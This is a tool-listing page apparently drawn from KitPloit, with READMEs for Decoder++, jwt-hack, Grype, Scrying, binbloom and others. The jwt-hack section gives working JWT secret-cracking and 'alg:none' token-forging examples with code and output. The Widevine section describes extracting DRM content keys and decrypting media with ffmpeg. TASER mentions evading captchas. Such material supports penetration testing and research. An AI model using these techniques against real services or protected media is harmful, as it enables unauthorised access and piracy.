Channel: KitPloit - PenTest Tools!

Decoder++ - An Extensible Application For Penetration Testers And Software Developers To Decode/Encode Data Into Various Formats



An extensible application for penetration testers and software developers to decode/encode data into various formats.


Setup

Decoder++ can be either installed by using pip or by pulling the source from this repository:

# Install using pip
pip3 install decoder-plus-plus

Overview

This section provides an overview of the ways of interacting with Decoder++. For additional usage information, check out the Advanced Usage section.


Graphical User Interface

If you prefer a graphical user interface to transform your data Decoder++ gives you two choices: a main-window-mode and a dialog-mode.


 

While the main-window-mode supports tabbing, the dialog-mode can return the transformed content to stdout, ready for further processing. This comes in handy if you want to call Decoder++ from other tools like BurpSuite (check out the BurpSuite Send-to extension) or from any other script to which you want to add a graphical user interface for flexible transformation of any input.



Command Line

If you don't want to start a graphical user interface but still want to use the various transformation methods of Decoder++, you can use the command-line mode:

$ python3 dpp.py -e base64 -h sha1 "Hello, world!"
e52d74c6d046c390345ae4343406b99587f2af0d
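The chained transformation above can be reproduced in plain Python, assuming the SHA1 hash is applied to the Base64-encoded text (a sketch of the idea, not Decoder++ internals):

```python
import base64
import hashlib

data = "Hello, world!"
# -e base64: encode the input as Base64 text
b64 = base64.b64encode(data.encode()).decode()   # SGVsbG8sIHdvcmxkIQ==
# -h sha1: hash the resulting text
digest = hashlib.sha1(b64.encode()).hexdigest()
print(digest)
```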

Features
  • User Interfaces:
    • Graphical User Interface
    • Command Line Interface
  • Preinstalled Scripts and Codecs:
    • Encode/Decode: Base16, Base32, Base64, Binary, Gzip, Hex, Html, JWT, HTTP64, Octal, Url, Url+, Zlib
    • Hashing: Adler-32, Apache-Md5, CRC32, FreeBSD-NT, Keccak224, Keccak256, Keccak384, Keccak512, LM, Md2, Md4, Md5, NT, PHPass, RipeMd160, Sha1, Sha3 224, Sha3 256, Sha3 384, Sha3 512, Sha224, Sha256, Sha384, Sha512, Sun Md5
    • Scripts: CSS-Minify, Caesar, Filter-Lines, Identify File Format, Identify Hash Format, JS-Beautifier, JS-to-XML, HTML-Beautifier, Little/Big-Endian Transform, Reformat Text, Remove Newlines, Remove Whitespaces, Search and Replace, Split and Rejoin, Unescape/Escape String
  • Smart-Decode
  • Plugin System
  • Load & Save Current Session
  • Platforms:
    • Windows
    • Linux
    • MAC

Advanced Usage

This section provides additional information about how the command-line interface and the interactive Python shell can be used.


Command Line Interface

The command-line interface gives you easy access to all available codecs.

To list them, use the -l argument. To narrow down your search, the -l argument accepts additional parameters which are used as filters:

$ dpp -l base enc

Codec Type
----- ----
base16 encoder
base32 encoder
base64 encoder

Decoder++ distinguishes between encoders, decoders, hashers and scripts. Like the graphical user interface, the command-line interface allows you to use multiple codecs in a row:

$ dpp "H4sIAAXmeVsC//NIzcnJ11Eozy/KSVEEAObG5usNAAAA" -d base64 -d gzip
Hello, world!

While encoders, decoders and hashers can be used right away, some scripts may require additional configuration. To show all available options of a specific script, add the help parameter:

$ dpp "Hello, world!" -s split_and_rejoin help

Split & Rejoin
==============

Name               Value  Group            Required  Description
----               -----  -----            --------  -----------
split_by_chars            split_behaviour  yes       the chars used at which to split the text
split_by_length    0      split_behaviour  yes       the length used at which to split the text
rejoin_with_chars                          yes       the chars used to join the split text
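For illustration, the effect of Split & Rejoin can be approximated in plain Python (hypothetical parameter values, not the actual plugin code):

```python
def split_and_rejoin(text, split_by_chars, rejoin_with_chars):
    # split the text at the given characters, then join the parts again
    return rejoin_with_chars.join(text.split(split_by_chars))

print(split_and_rejoin("Hello, world!", ", ", " "))  # Hello world!
```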

To configure a specific script you need to supply the individual options as name-value pairs (e.g. search_term="Hello"):

$ dpp "Hello, world!" -s search_and_replace search_term="Hello" replace_term="Hey"
Hey, world!

Plugin Development

To add custom codecs just copy them into the $HOME/.config/dpp/plugins/ folder.

from dpp.core.plugin.abstract_plugin import DecoderPlugin

class Plugin(DecoderPlugin):
    """
    Possible plugins are DecoderPlugin, EncoderPlugin, HasherPlugin or ScriptPlugin.
    See AbstractPlugin or its implementations for more information.
    """

    def __init__(self, context):
        plugin_name = "URL"
        plugin_author = "Your Name"
        # Python libraries which are required to execute the run method of this plugin.
        plugin_requirements = ["urllib"]
        super().__init__(plugin_name, plugin_author, plugin_requirements)

    def run(self, text):
        # Load the required libraries here ...
        import urllib.parse
        # Run your action ...
        return urllib.parse.unquote(text)

Contribute

Feel free to open a new ticket for any feature request or bug. Also don't hesitate to open pull requests for new features/plugins.

Thanks to

  • Tim Menapace (RIPEMD160, KECCAK256)
  • Robin Krumnow (ROT13)

Troubleshooting

Signals are not working on Mac OS

When starting Decoder++ in Mac OS signals are not working.

This might happen when PyQt5 is installed using homebrew. To fix this issue it is recommended to install the libdbus-1 library. See http://doc.qt.io/qt-5/osx-issues.html#d-bus-and-macos for more information regarding this issue.


Cannot start Decoder++ in Windows using CygWin

When starting Decoder++ in CygWin an error occurs:

  ModuleNotFoundError: No module named 'PyQt5'

This happens although PyQt5 is installed via pip. Currently there is no fix for this; instead, it is recommended to start Decoder++ from the Windows command line.


Inspired By
  • PortSwigger's Burp Decoder

Powered By
  • PyQt5
  • QtAwesome



JWT-Hack - Tool To Encode/Decode JWT, Generate Payloads For JWT Attacks And Very Fast Cracking (Dict/Bruteforce)



jwt-hack is a tool for hacking and security testing of JWTs. It supports encoding/decoding JWTs, generating payloads for JWT attacks and very fast cracking (dictionary/brute-force).


Installation

go-get(dev version)
$ go get -u github.com/hahwul/jwt-hack

homebrew
$ brew tap hahwul/jwt-hack
$ brew install jwt-hack

snapcraft
$ sudo snap install jwt-hack

Usage
[jwt-hack ASCII-art banner]
Hack the JWT(JSON Web Token) | by @hahwul | v1.0.0

Usage:
  jwt-hack [command]

Available Commands:
  crack     Cracking JWT Token
  decode    Decode JWT to JSON
  encode    Encode json to JWT
  help      Help about any command
  payload   Generate JWT attack payloads
  version   Show version

Flags:
  -h, --help   help for jwt-hack



Encode mode (JSON to JWT)
$ jwt-hack encode '{"json":"format"}' --secret={YOUR_SECRET}

e.g.

$ jwt-hack encode '{"test":"1234"}' --secret=asdf
INFO[0000] Encoded result algorithm=HS256
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ0ZXN0IjoiMTIzNCJ9.JOL1SYkRZYUz9GVny-DgoDj60C0RLz929h1_fFcpqQA

Decode mode (JWT to JSON)
$ jwt-hack decode {JWT_CODE}

e.g.

$ jwt-hack decode eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c

INFO[0000] Decoded data(claims) header="{\"alg\":\"HS256\",\"typ\":\"JWT\"}" method="&{HS256 5}"
{"iat":1516239022,"name":"John Doe","sub":"1234567890"}
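Decoding a JWT is plain base64url decoding of the payload segment; a minimal Python sketch (independent of jwt-hack), using the token from the example above:

```python
import base64
import json

def jwt_claims(token):
    """Return the claims of a JWT without verifying its signature."""
    pad = lambda s: s + "=" * (-len(s) % 4)   # restore stripped base64 padding
    _header, body, _sig = token.split(".")
    return json.loads(base64.urlsafe_b64decode(pad(body)))

token = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
         "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c")
print(jwt_claims(token))  # {'sub': '1234567890', 'name': 'John Doe', 'iat': 1516239022}
```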

Crack mode (Dictionary attack / BruteForce)
$ jwt-hack crack -w {WORDLIST} {JWT_CODE}

e.g.

$ jwt-hack crack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA -w samples/wordlist.txt

[*] Start dict cracking mode
INFO[0000] Loaded words (remove duplicated) size=16
INFO[0000] Invalid signature word=fas
INFO[0000] Invalid signature word=asd
INFO[0000] Invalid signature word=1234
INFO[0000] Invalid signature word=efq
INFO[0000] Invalid signature word=asdf
INFO[0000] Invalid signature word=2q
INFO[0000] Found! Token signature secret is test Signature=Verified Word=test
INFO[0000] Invalid signature word=dfas
INFO[0000] Invalid signature word=ga
INFO[0000] Invalid signature word=f
INFO[0000] Invalid signature word=ds
INFO[0000] Invalid signature word=sad
INFO[0000] Invalid signature word=qsf
...
INFO[0000] Invalid signature word=password
INFO[0000] Invalid signature word=error
INFO[0000] Invalid signature word=calendar
[+] Found! JWT signature secret: test
[+] Finish crack mode
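A dictionary attack on an HS256 token boils down to recomputing the signature for each candidate secret and comparing. A self-contained Python sketch of the idea (not jwt-hack's actual implementation):

```python
import base64
import hashlib
import hmac

def b64url(data):
    # base64url without padding, as used in JWTs
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(signing_input, secret):
    return b64url(hmac.new(secret, signing_input, hashlib.sha256).digest())

def crack_hs256(token, wordlist):
    header, body, sig = token.split(".")
    signing_input = f"{header}.{body}".encode()
    for word in wordlist:
        if hmac.compare_digest(sign_hs256(signing_input, word.encode()), sig):
            return word
    return None

# build a token with a known secret, then recover it by dictionary attack
header = b64url(b'{"alg":"HS256","typ":"JWT"}')
body = b64url(b'{"sub":"1234567890"}')
sig = sign_hs256(f"{header}.{body}".encode(), b"test")
token = f"{header}.{body}.{sig}"
print(crack_hs256(token, ["fas", "asd", "1234", "test"]))  # test
```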

Payload mode (alg:none attack, etc.)
$ jwt-hack payload {JWT_CODE}

e.g.

$ jwt-hack payload eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.5mhBHqs5_DTLdINd9p5m7ZJ6XD0Xc55kIaCRY5r6HRA
payload called
INFO[0000] Generate none payload header="{\"alg\":\"none\",\"typ\":\"JWT\"}" payload=none
eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate NonE payload header="{\"alg\":\"NonE\",\"typ\":\"JWT\"}" payload=NonE
eyJhbGciOiJOb25FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate NONE payload header="{\"alg\":\"NONE\",\"typ\":\"JWT\"}" payload=NONE
eyJhbGciOiJOT05FIiwidHlwIjoiSldUIn0=.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate jku payload header="{\"alg\":\"hs256\",\"jku\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=jku
eyJhbGciOiJoczI1NiIsImprdSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
INFO[0000] Generate x5u payload header="{\"alg\":\"hs256\",\"x5u\":\"https://www.google.com\",\"typ\":\"JWT\"}" payload=x5u
eyJhbGciOiJoczI1NiIsIng1dSI6Imh0dHBzOi8vd3d3Lmdvb2dsZS5jb20iLCJ0eXAiOiJKV1QifQ==.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.
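The alg:none payloads shown above are forged by rewriting the header and dropping the signature. A hedged Python sketch of the technique (function name is illustrative; jwt-hack's own output keeps the Base64 padding, as seen above):

```python
import base64
import json

def forge_alg_none(token, alg="none"):
    pad = lambda s: s + "=" * (-len(s) % 4)
    head_b64, body_b64, _sig = token.split(".")
    header = json.loads(base64.urlsafe_b64decode(pad(head_b64)))
    header["alg"] = alg   # try "none", "NonE", "NONE" to probe case-sensitive filters
    new_head = base64.urlsafe_b64encode(
        json.dumps(header, separators=(",", ":")).encode()).decode()
    return f"{new_head}.{body_b64}."   # empty signature segment

token = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
         "eyJzdWIiOiIxMjM0NTY3ODkwIn0.ignored")
print(forge_alg_none(token))  # header becomes eyJhbGciOiJub25lIiwidHlwIjoiSldUIn0=
```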


TASER - Python3 Resource Library For Creating Security Related Tooling



TASER (Testing And SEcurity Resource) is a Python resource library used to simplify the process of creating offensive security tooling, especially for web or external assessments. Its modular design makes it easy for code to be customized and re-purposed in a variety of scenarios.


Key features
  • Easily invoke web spiders or search engine scrapers to aid in data collection.
  • Supports rotating User-Agents and/or proxies, and custom headers per request to evade captchas.
  • Implement concurrent web requests with threading or asyncio.
  • Uses Python logging to create custom console, file, and database loggers for various output formats.
  • Automatically detects Windows to control ANSI colored output when using the Taser custom adapter.

Install

Latest code commits:

git clone https://github.com/m8r0wn/taser
cd taser
python3 setup.py install

Last release:

pip3 install taser

Getting Started

Find the latest documentation on the project Wiki, or check out the examples folder for sample tools and usage.


@ToDo
  • Documentation
  • Hack the Planet!


Grype - A Vulnerability Scanner For Container Images And Filesystems



A vulnerability scanner for container images and filesystems. Easily install the binary to try it out.


Features

  • Scan the contents of a container image or filesystem to find known vulnerabilities.
  • Find vulnerabilities for major operating system packages
    • Alpine
    • BusyBox
    • CentOS / Red Hat
    • Debian
    • Ubuntu
  • Find vulnerabilities for language-specific packages
    • Ruby (Bundler)
    • Java (JARs, etc)
    • JavaScript (NPM/Yarn)
    • Python (Egg/Wheel)
    • Python pip/requirements.txt/setup.py listings
  • Supports Docker and OCI image formats

If you encounter an issue, please let us know using the issue tracker.


Getting started

Install the binary, and make sure that grype is available in your path. To scan for vulnerabilities in an image:

grype <image>

The above command scans for vulnerabilities that are visible in the container (i.e., the squashed representation of the image). To include software from all image layers in the vulnerability scan, regardless of its presence in the final image, provide --scope all-layers:

grype <image> --scope all-layers

Grype can scan a variety of sources beyond those found in Docker.

# scan a container image archive (from the result of `docker image save ...`, `podman save ...`, or `skopeo copy` commands)
grype path/to/image.tar

# scan a directory
grype dir:path/to/dir

The output format for Grype is configurable as well:

grype <image> -o <format>

Where the formats available are:

  • json: Use this to get as much information out of Grype as possible!
  • cyclonedx: An XML report conforming to the CycloneDX 1.2 specification.
  • table: A columnar summary (default).

Grype pulls a database of vulnerabilities derived from the publicly available Anchore Feed Service. This database is updated at the beginning of each scan, but an update can also be triggered manually.

grype db update

Installation

Recommended

# install the latest version to /usr/local/bin
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b /usr/local/bin

# install a specific version into a specific dir
curl -sSfL https://raw.githubusercontent.com/anchore/grype/main/install.sh | sh -s -- -b <SOME_BIN_PATH> <RELEASE_VERSION>

macOS

brew tap anchore/grype
brew install grype

You may experience a "macOS cannot verify app is free from malware" error upon running Grype because it is not yet signed and notarized. You can override this using xattr.

xattr -rd com.apple.quarantine grype

Shell Completion

Grype supplies shell completion through its CLI implementation (cobra). Generate the completion code for your shell by running one of the following commands:

  • grype completion <bash|fish>
  • go run main.go completion <bash|fish>

This will output a shell script to STDOUT, which can then be used as a completion script for Grype. Running one of the above commands with the -h or --help flags will provide instructions on how to do that for your chosen shell.

Note: Cobra has not yet released full ZSH support, but as soon as that gets released, we will add it here!


Configuration

Configuration search paths:

  • .grype.yaml
  • .grype/config.yaml
  • ~/.grype.yaml
  • <XDG_CONFIG_HOME>/grype/config.yaml

Configuration options (example values are the default):

# enable/disable checking for application updates on startup
check-for-app-update: true

# same as --fail-on ; upon scanning, if a severity is found at or above the given severity then the return code will be 1
# default is unset which will skip this validation (options: negligible, low, medium, high, critical)
fail-on-severity: ''

# same as -o ; the output format of the vulnerability report (options: table, json, cyclonedx)
output: "table"

# same as -s ; the search space to look for packages (options: all-layers, squashed)
scope: "squashed"

# same as -q ; suppress all output (except for the vulnerability list)
quiet: false

db:
  # check for database updates on execution
  auto-update: true

  # location to write the vulnerability database cache
  cache-dir: "$XDG_CACHE_HOME/grype/db"

  # URL of the vulnerability database
  update-url: "https://toolbox-data.anchore.io/grype/databases/listing.json"

log:
  # location to write the log file (default is not to have a log file)
  file: ""

  # the log level; note: detailed logging suppresses the ETUI
  level: "error"

  # use structured logging
  structured: false

Future plans

The following areas of potential development are currently being investigated:

  • Support for allowlist, package mapping
  • Establish a stable interchange format w/Syft
  • Accept SBOM (CycloneDX, Syft) as input instead of image/directory


iSH - Linux Shell For iOS



A project to get a Linux shell running on iOS, using usermode x86 emulation and syscall translation.

For the current status of the project, check the issues tab, and the commit logs.


Hacking

This project has a git submodule, make sure to clone with --recurse-submodules or run git submodule update --init after cloning.

You'll need these things to build the project:

  • Python 3
  • Ninja
  • Meson (pip install meson)
  • Clang and LLD (on mac, brew install llvm, on linux, sudo apt install clang lld or sudo pacman -S clang lld or whatever)
  • sqlite3 (this is so common it may already be installed on linux and is definitely already installed on mac. if not, do something like sudo apt install libsqlite3-dev)
  • libarchive (brew install libarchive, sudo port install libarchive, sudo apt install libarchive-dev) TODO: bundle this dependency

Build for iOS

Open the project in Xcode, open iSH.xcconfig, and change ROOT_BUNDLE_IDENTIFIER to something unique. Then click Run. There are scripts that should do everything else automatically. If you run into any problems, open an issue and I'll try to help.


Build command line tool for testing

To set up your environment, cd to the project and run meson build to create a build directory in build. Then cd to the build directory and run ninja.

To set up a self-contained Alpine Linux filesystem, download the Alpine minirootfs tarball for i386 from the Alpine website and run ./tools/fakefsify, with the minirootfs tarball as the first argument and the name of the output directory as the second argument. Then you can run things inside the Alpine filesystem with ./ish -f alpine /bin/login -f root, assuming the output directory is called alpine. If tools/fakefsify doesn't exist in your build directory, that might be because it couldn't find libarchive on your system (see above for ways to install it).

You can replace ish with tools/ptraceomatic to run the program in a real process and single step and compare the registers at each step. I use it for debugging. Requires 64-bit Linux 4.11 or later.


Logging

iSH has several logging channels which can be enabled at build time. By default, all of them are disabled. To enable them:

  • In Xcode: Set the ISH_LOG setting in iSH.xcconfig to a space-separated list of log channels.
  • With Meson (command line tool for testing): Run meson configure -Dlog="<space-separated list of log channels>".

Available channels:

  • strace: The most useful channel, logs the parameters and return value of almost every system call.
  • instr: Logs every instruction executed by the emulator. This slows things down a lot.
  • verbose: Debug logs that don't fit into another category.
  • Grep for DEFAULT_CHANNEL to see if more log channels have been added since this list was updated.

A note on the JIT

Possibly the most interesting thing I wrote as part of iSH is the JIT. It's not actually a JIT since it doesn't target machine code. Instead it generates an array of pointers to functions called gadgets, and each gadget ends with a tailcall to the next function; like the threaded code technique used by some Forth interpreters. The result is a speedup of roughly 3-5x compared to pure emulation.
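The gadget-array idea can be illustrated in Python (the real gadgets in iSH are assembly with genuine tailcalls; Python has no tail-call elimination, so this only shows the control-flow shape):

```python
# each "gadget" does its bit of work, then dispatches to the next
# function pointer in the "compiled" array
def add1(prog, i, acc):
    return prog[i](prog, i + 1, acc + 1)

def dbl(prog, i, acc):
    return prog[i](prog, i + 1, acc * 2)

def done(prog, i, acc):
    return acc

prog = [dbl, done]            # the rest of the program after the entry gadget
result = add1(prog, 0, 1)     # computes (1 + 1) * 2
print(result)                 # 4
```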

Unfortunately, I made the decision to write nearly all of the gadgets in assembly language. This was probably a good decision with regards to performance (though I'll never know for sure), but a horrible decision with regards to readability, maintainability, and my sanity. The amount of bullshit I've had to put up with from the compiler/assembler/linker is insane. It's like there's a demon in there that makes sure my code is sufficiently deformed, and if not, makes up stupid reasons why it shouldn't compile. In order to stay sane while writing this code, I've had to ignore best practices in code structure and naming. You'll find macros and variables with such descriptive names as ss and s and a. Assembler macros nested beyond belief. And to top it off, there are almost no comments.

So a warning: Long-term exposure to this code may cause loss of sanity, nightmares about GAS macros and linker errors, or any number of other debilitating side effects. This code is known to the State of California to cause cancer, birth defects, and reproductive harm.



Awesome Android Security - A Curated List Of Android Security Materials And Resources For Pentesters And Bug Hunters



A curated list of Android Security materials and resources For Pentesters and Bug Hunters.


Blog

How To's

Paper

Books

Course

Tools

Static Analysis

Dynamic Analysis

Online APK Analyzers

Online APK Decompiler

Labs

Talks

Misc

Bug Bounty & Writeup

Cheat Sheet


Scrying - A Tool For Collecting RDP, Web And VNC Screenshots All In One Place



A new tool for collecting RDP, web and VNC screenshots all in one place

This tool is still a work-in-progress and should be mostly usable but is not yet complete. Please file any bugs or feature requests as GitHub issues


Caveats
  • Web screenshotting relies on Chromium or Google Chrome being installed

Motivation

Since Eyewitness recently dropped support for RDP, there isn't a working CLI tool for capturing RDP screenshots. Nessus still works, but it's a pain to get the images out, and they're not included in the export file.

I thought this was a good opportunity to write a fresh tool that's more powerful than those that came before. Check out the feature list!


Installation

For web screenshotting, scrying currently depends on there being an installation of Chromium or Google Chrome. Install with pacman -S chromium or the equivalent for your OS.

Download the latest release from the releases tab. There's a Debian package available for distros that use them (install with sudo dpkg -i scrying*.deb), and zipped binaries for Windows, Mac, and other Linuxes.


Usage

Grab a single web page, RDP server, or VNC server:

$ scrying -t http://example.com
$ scrying -t rdp://192.0.2.1
$ scrying -t 2001:db8::5 --mode web
$ scrying -t 2001:db8::5 --mode rdp
$ scrying -t 192.0.2.2
$ scrying -t vnc://[2001:db8::53]:5901

Automatically grab screenshots from an nmap output:

$ nmap -iL targets.txt -p 80,443,8080,8443,3389 -oX targets.xml
$ scrying --nmap targets.xml

Choose a different output directory for images:

$ scrying -t 2001:db8::3 --output-dir /tmp/scrying_outputs

Run from a targets file:

$ cat targets.txt
http://example.com
rdp://192.0.2.1
2001:db8::5
$ scrying -f targets.txt

Run through a web proxy:

$ scrying -t http://example.com --web-proxy http://127.0.0.1:8080
$ scrying -t http://example.com --web-proxy socks5://\[::1\]:1080

Image files are saved as PNG in the following directory structure:

output
├── report.html
├── rdp
│   └── 192.0.2.1-3389.png
├── vnc
│   └── 192.0.2.1-5900.png
└── web
    └── https_example.com.png

Check out the report at output/report.html!


Features:

Features with ticks next to them have been implemented; the others are TODO

  • ✔️ Automatically decide whether an input should be treated as a web address or RDP server
  • ✔️ Automatically create output directory if it does not already exist
  • ✔️ Save images with consistent and unique filenames derived from the host/IP
  • ✔️ Full support for IPv6 and IPv4 literals as well as hostnames
  • ✔️ Read targets from a file and decide whether they're RDP or HTTP or use hints
  • ✔️ Parse targets smartly from Nmap and Nessus output
  • ✔️ HTTP - uses Chromium/Chrome in headless mode
  • ✔️ Full cross-platform support - tested on Linux, Windows and Mac
  • Produces an HTML report to allow easy browsing of the results
  • VNC
  • RDP - mostly working, does not support "plain RDP" mode, see #15
  • Video streams - tracking issue #5
  • option for timestamps in filenames
  • Read targets from a msf services -o csv output
  • OCR on RDP usernames, either live or on a directory of images
  • NLA/auth to test credentials
  • Parse Dirble JSON output to grab screenshots of an entire website - waiting for nccgroup/dirble#51

Help text
USAGE:
scrying [FLAGS] [OPTIONS] <--file <FILE>...|--nmap <NMAP XML FILE>...|--nessus <NESSUS XML FILE>...|--target <TARGET>...>

FLAGS:
-s, --silent Suppress most log messages
--test-import Exit after importing targets
-v, --verbose Increase log verbosity
-h, --help Prints help information
-V, --version Prints version information

OPTIONS:
-f, --file <FILE>... Targets file, one per line
-l, --log-file <LOG FILE> Save logs to the given file
-m, --mode <MODE>
Force targets to be parsed as `web`, `rdp`, `vnc` [default: auto] [possible values:
web, rdp, vnc, auto]
--nessus <NESSUS XML FILE>... Nessus XML file
--nmap <NMAP XML FILE>... Nmap XML file
-o, --output <OUTPUT DIR> Directory to save the captured images in [default: output]
--proxy <PROXY>
Default SOCKS5 proxy to use for connections e.g. socks5://[::1]:1080

--rdp-proxy <RDP PROXY>
SOCKS5 proxy to use for RDP connections e.g. socks5://[::1]:1080

--rdp-timeout <RDP TIMEOUT>
Seconds to wait after last bitmap before saving an image [default: 2]

-t, --target <TARGET>... Target, e.g. http://example.com, rdp://[2001:db8::4]
--threads <THREADS> Number of worker threads for each target type [default: 10]
--web-proxy <WEB PROXY>
HTTP/SOCKS Proxy to use for web requests e.g. http://[::1]:8080


Widevine-L3-Decryptor - A Chrome Extension That Demonstrates Bypassing Widevine L3 DRM



Widevine is a Google-owned DRM system that's in use by many popular streaming services (Netflix, Spotify, etc.) to prevent media content from being downloaded.

But Widevine's least secure security level, L3, as used in most browsers and PCs, is implemented 100% in software (i.e. no hardware TEEs), thereby making it reversible and bypassable.

This Chrome extension demonstrates how it's possible to bypass Widevine DRM by hijacking calls to the browser's Encrypted Media Extensions (EME) and decrypting all Widevine content keys transferred - effectively turning it into a clearkey DRM.


Usage

To see this concept in action, just load the extension in Developer Mode and browse to any website that plays Widevine-protected content, such as https://bitmovin.com/demos/drm [Update: link got broken?].

Keys will be logged in plaintext to the JavaScript console.

e.g.:

WidevineDecryptor: Found key: 100b6c20940f779a4589152b57d2dacb (KID=eb676abbcb345e96bbcf616630f1a3da)

Decrypting the media itself is then just a matter of using a tool that can decrypt MPEG-CENC streams, like ffmpeg.

e.g.:

ffmpeg -decryption_key 100b6c20940f779a4589152b57d2dacb -i encrypted_media.mp4 -codec copy decrypted_media.mp4

NOTE: The extension currently supports the Windows platform only.


How

In the context of browsers the actual decryption of the media is usually done inside a proprietary binary (widevinecdm.dll, known as the Content Decryption Module or CDM) only after receiving the license from a license server with an encrypted key in it.

This binary is usually heavily obfuscated and makes use of third-party solutions that claim to offer software "protection" such as Arxan or Whitecryption.

Some reverse engineering of that binary can then be done to extract the secret keys and mimic the key decryption algorithm from the license response.


Why

This PoC was done to further show that code obfuscation, anti-debugging tricks, whitebox cryptography algorithms and other methods of security-by-obscurity will eventually be defeated anyway, and are, in a way, pointless.


Legal Disclaimer

This is for educational purposes only. Downloading copyrighted materials from streaming services may violate their Terms of Service. Use at your own risk.




eDEX-UI - A Cross-Platform, Customizable Science Fiction Terminal Emulator With Advanced Monitoring & Touchscreen Support



eDEX-UI is a fullscreen, cross-platform terminal emulator and system monitor that looks and feels like a sci-fi computer interface.

Heavily inspired by the TRON Legacy movie effects (especially the Board Room sequence), the eDEX-UI project was originally meant to be "DEX-UI with less « art » and more « distributable software »". While keeping a futuristic look and feel, it strives to maintain a certain level of functionality and to be usable in real-life scenarios, with the larger goal of bringing science-fiction UXs to the mainstream.


Features
  • Fully featured terminal emulator with tabs, colors, mouse events, and support for curses and curses-like applications.
  • Real-time system (CPU, RAM, swap, processes) and network (GeoIP, active connections, transfer rates) monitoring.
  • Full support for touch-enabled displays, including an on-screen keyboard.
  • Directory viewer that follows the CWD (current working directory) of the terminal.
  • Advanced customization using themes, on-screen keyboard layouts, CSS injections. See the wiki for more info.
  • Optional sound effects made by a talented sound designer for maximum Hollywood hacking vibe.

Screenshots



(neofetch on eDEX-UI 2.2 with the default "tron" theme & QWERTY keyboard)


 

(Graphical settings editor and list of keyboard shortcuts on eDEX-UI 2.2 with the "interstellar" bright theme)


 

(cmatrix on eDEX-UI 2.2 with the experimental "tron-disrupted" theme, and the user-contributed DVORAK keyboard)


Useful commands for the nerds

IMPORTANT NOTE: the following instructions are meant for running eDEX from the latest unoptimized, unreleased, development version. If you'd like to get stable software instead, refer to these instructions.


Starting from source:

on *nix systems (You'll need the Xcode command line tools on macOS):

  • clone the repository
  • npm run install-linux
  • npm start

on Windows:

  • start cmd or powershell as administrator
  • clone the repository
  • npm run install-windows
  • npm start

Building

Note: Due to native modules, you can only build targets for the host OS you are using.

  • npm install (NOT install-linux or install-windows)
  • npm run build-linux or build-windows or build-darwin

The script will minify the source code, recompile native dependencies and create distributable assets in the dist folder.


A note about versioning, branches, and commit messages

Currently, development is done directly on the master branch. The version tag on this branch is the version tag of the next release with the -pre suffix (e.g. v2.6.1-pre), to avoid confusion when both release and source versions are installed on one's system.

I use gitmoji to make my commit messages, but I'm not enforcing this on this repo so commits from PRs and the like might not be formatted that way.

Dependabot runs weekly to check for dependency updates. It is set up to auto-merge most of them as long as the build checks pass.


Credits

eDEX-UI's source code was primarily written by me, Squared. If you want to get in touch with me or find other projects I'm involved in, check out my website.

PixelyIon helped me get started with Windows compatibility and offered some precious advice when I started to work on this project seriously.

IceWolf composed the sound effects on v2.1.x and above. He makes really cool stuff, check out his music!


Thanks

Of course, eDEX would never have existed if I hadn't stumbled upon the amazing work of Seena on r/unixporn.

This project uses a bunch of open-source libraries, frameworks and tools, see the full dependency graph.

I want to namely thank the developers behind xterm.js, systeminformation and SmoothieCharts.

Huge thanks to Rob "Arscan" Scanlon for making the fantastic ENCOM Globe, also inspired by the TRON: Legacy movie, and distributing it freely. His work really puts the icing on the cake.



Binbloom - Raw Binary Firmware Analysis Software



The purpose of this project is to analyse a raw binary firmware and automatically determine some of its features. The tool is compatible with all architectures, since it essentially just runs simple statistics on the binary.

In order to compute the loading address, you will need the help of an external reverse engineering tool to extract a list of potential functions, before using binbloom.


Main features:

  • Loading address: binbloom can parse a raw binary firmware and determine its loading address.
  • Endianness: binbloom can use heuristics to determine the endianness of a firmware.
  • UDS Database: binbloom can parse a raw binary firmware and check if it contains an array containing UDS command IDs.

Download / Install

First, clone the git repository:

git clone https://github.com/quarkslab/binbloom.git
cd binbloom

To build the latest version:

mkdir build
cd build
cmake ..
make

To install the latest version (linux only):

make install

Getting started

Determine the endianness
binbloom -f firmware.bin -e

This command should give an output like this:

Loaded firmware.bin, size:624128, bit:fff00000, 000fffff, nb_segments:4096, shift:20
End address:00098600
Determining the endianness
